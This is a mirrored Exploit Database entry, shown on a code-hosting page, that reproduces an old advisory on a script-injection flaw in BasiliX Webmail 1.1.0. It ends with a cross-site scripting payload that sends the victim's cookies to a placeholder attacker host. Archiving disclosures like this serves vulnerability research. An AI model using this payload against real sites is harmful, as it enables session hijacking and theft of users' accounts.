bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/21570.txt
Offensive Security d304cc3d3e DB: 2017-11-24 
116602 new exploits

Too many to list!
2017-11-24 20:56:23 +00:00

10 lines
No EOL
586 B
Text
Raw Blame History

source: http://www.securityfocus.com/bid/5060/info
BasiliX is a web-based mail application. It offers features such as mail attachments, address book, multiple language and theme support.
A script injection issue has been reported in BasiliX Webmail. Script commands are not filtered from the Subject or message body, and may execute in the context of the BasiliX site when the content is viewed.
This has been reported in BasiliX Webmail 1.1.0, earlier versions may also be affected.
<script>self.location.href="http://evilhost.com/evil?"+escape(document.
cookie)</script>
Reference in a new issue View git blame Copy permalink